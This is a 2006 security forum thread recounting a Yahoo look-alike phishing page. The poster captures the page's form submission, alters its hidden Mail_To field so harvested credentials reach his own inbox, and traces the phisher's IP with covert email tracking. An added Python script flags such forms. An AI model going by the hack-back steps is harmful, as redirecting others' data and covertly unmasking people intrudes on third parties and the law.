When I was phished?

<<

morpheus063

Sr. Member

Posts: 393

Joined: Sun Jun 25, 2006 10:08 am

Location: Cochin - India

Post Sun Sep 17, 2006 5:36 am

When I was phished?

Hi All,

I would like to share with you a phishing experience I had to face recently.

For those who need an introduction on Phishing:
Phishing and Identity Theft
In computing, phishing is a form of criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication. Phishing is typically carried out using email or an instant message, although phone contact has been used as well.

Phishing techniques
Most methods of phishing use some form of technical deception designed to make a link in an email appear to belong to the spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers.



Recently I received an instant message (Yahoo) from one of my friends, who is not very good with the technical aspects of the Internet. He is just a common internet user. The message received:
http://www.geocities.com/chakkkara_ummma/yahoo.html
Click this link and login ur yahoo id, u will get a wonderful gift enjoy. pls send this message to all ur buddies


As a normal enthusiastic user, we all have the tendency to open the link. When a user clicks on the above link, it opens a page as displayed below:

Image

If you look closely at the displayed page, it looks very similar to the Yahoo login page. However, it is not a Yahoo page. The cracker (let's not call him a hacker, as hacking is never unethical) has smartly created a web page which looks very similar to the login page of Yahoo. When a novice user fills in the page with his username and password and clicks the Sign In button, in the background the entered user credentials (username and password) are sent to some database / email ID. My friend entered his username and password unknowingly and ..... So I decided to find the culprit.

Let's Find the Culprit

Using Tamper Data (an add-on for Mozilla Firefox), I captured the information sent through this web page. See the below screen shot:

Image

If you look at the above image very closely, you can easily understand the following facts (refer to the red lines):

* When the user clicks the Sign In button, the page is redirected to http://www2.fiberbit.net/form/mailto.cgi
* The page (or the script) is programmed in such a way that a mail will be sent to love.cynade@gmail.com. (refer to the field "Mail_To")
* The mail will appear to come from SpArKz (refer to the field "Mail_From")
* Once the mail is sent, the page will be automatically redirected to http://photos.yahoo.com. (refer to the field "Next_Page")

So we have found the cracker here. The person's email ID is love.cynade@gmail.com.

A step further.
Using the same tool mentioned above, the data sent from a web page can be altered. So what I have done is, I changed the "Mail_To" value from love.cynade@gmail.com (internally the email id love.cynade@gmail.com is represented as love.cynade%40gmail.com) to xxxx.zzzzzzzz@gmail.com (my email ID). And hurray, I got the details delivered in my mail box. See the below screen shot:

Image

It displayed the full information about the user who visited the site which includes:

* The ISP of the User - in my case it is Asianet.co.in.
* The IP address of the user - in my case it is 202.**.227.*** (not displayed due to various security reasons)
* This information can be further used to get into your personal system.

Tracing Down the Cracker
To trace the location of the hacker who was using the email ID love.cynade@gmail.com, I created a temporary email ID, registered a temporary account with ReadNotify.com and shot some mails to love.cynade@gmail.com. And hooray, when he opened the mails I got his IP address and that's it.

I wrote to Yahoo also regarding the same and they immediately removed the site from Geocities and replied back. And within weeks Yahoo changed their login screen also. The cracker was able to get into many compromised accounts and from there to many accounts like banks, e-commerce sites etc. using this simple technique.

The above quoted URL is currently not available as it has been removed by Yahoo. But there are still thousands of phishing sites available that may exploit the human factor of the internet technology.

Do you have any similar experiences - share it here - what ways the hacker approached you? ......

Regards,

The Morpheus
Manu Zacharia
MVP (Enterprise Security), ISLA-2010 (ISC)², C|EH, C|HFI, CCNA, MCP,
Certified ISO 27001:2005 Lead Auditor

There are 3 roads to spoil; women, gambling & hacking. The most pleasant with women, the quickest with gambling, but the surest is hacking - c0c0n
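
Added example, not part of the original post or thread: a Python check a defender could run over a saved page to flag the pattern described above, a look-alike login form that posts to a third-party form-to-mail script and carries the collection address in a hidden field. The sample HTML, host names and address are constructed placeholders; only the field names Mail_From, Mail_To and Next_Page come from the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, unquote

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

# Collects each <form>'s action URL and the attributes of its <input> fields.
class FormAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "inputs": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"].append(a)

def audit_login_page(html, page_url, expected_domain):
    """Return findings for every form on page_url that asks for a password."""
    auditor = FormAuditor()
    auditor.feed(html)
    findings = []
    page_host = urlparse(page_url).hostname or ""
    for form in auditor.forms:
        inputs = form["inputs"]
        if not any((i.get("type") or "").lower() == "password" for i in inputs):
            continue
        if not (page_host == expected_domain or page_host.endswith("." + expected_domain)):
            findings.append(f"password form served from {page_host}, not {expected_domain}")
        action_host = urlparse(form["action"]).hostname
        if action_host and action_host != page_host:
            findings.append(f"credentials posted to third-party host {action_host}")
        for i in inputs:
            value = unquote(i.get("value") or "")  # %40 is the URL-encoded '@'
            if (i.get("type") or "").lower() == "hidden" and EMAIL_RE.search(value):
                findings.append(f"hidden field {i.get('name')} carries an e-mail address")
    return findings

# Constructed sample modelled on the fields named in the post; hosts and address are placeholders.
SAMPLE = """
<form method="post" action="http://formmailer.example/form/mailto.cgi">
  <input type="hidden" name="Mail_From" value="SpArKz">
  <input type="hidden" name="Mail_To" value="collector%40mail.example">
  <input type="hidden" name="Next_Page" value="http://photos.yahoo.com">
  <input type="text" name="login"> <input type="password" name="passwd">
</form>
"""
if __name__ == "__main__":
    for finding in audit_login_page(SAMPLE, "http://freehost.example/user/yahoo.html", "yahoo.com"):
        print("SUSPICIOUS:", finding)
```
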
<<

Kev

Post Mon Sep 18, 2006 1:55 pm

Re: When I was phished?

Good of you to take the time to do all of that. I guess if more of us did that it would be helpful. I have found ReadNotify is a useful tool, but can be spoofed sometimes. Oh, you slipped and called the cracker a hacker at the end of your post, lol! Anyway, keep up the good work.
<<

jimbob

Post Mon Sep 18, 2006 2:17 pm

Re: When I was phished?

Firstly well done that man. I enjoyed your story, so I'll share one of mine.

I recently had a colleague who said, "My ebay account has been hacked." Alarm bells started ringing and I asked why he thought that was the case. "I got an email from ebay telling me so." This guy was no fool. I'm surprised he [almost] fell for it but glad he came to me first. Fear of identity theft made him believe he had been a victim, one of the oldest tricks in the phisher's toolkit.

I pointed out the signs that the email was fake. The URL was not an ebay website, all the usual tell tales. We should educate our friends, family and peers but need to do it right. If all we do is scare them we can inadvertently feed the beast.

Jim
<<

LSOChris

Post Mon Sep 18, 2006 4:56 pm

Re: When I was phished?

great post!
<<

don

Administrator

Posts: 4226

Joined: Sun Aug 28, 2005 10:47 pm

Location: Chicago

Post Wed Sep 20, 2006 1:30 pm

Re: When I was phished?

I agree, so I submitted it to digg:

http://digg.com/security/When_I_Was_Phished

Don
CISSP, MCSE, CSTA, Security+ SME
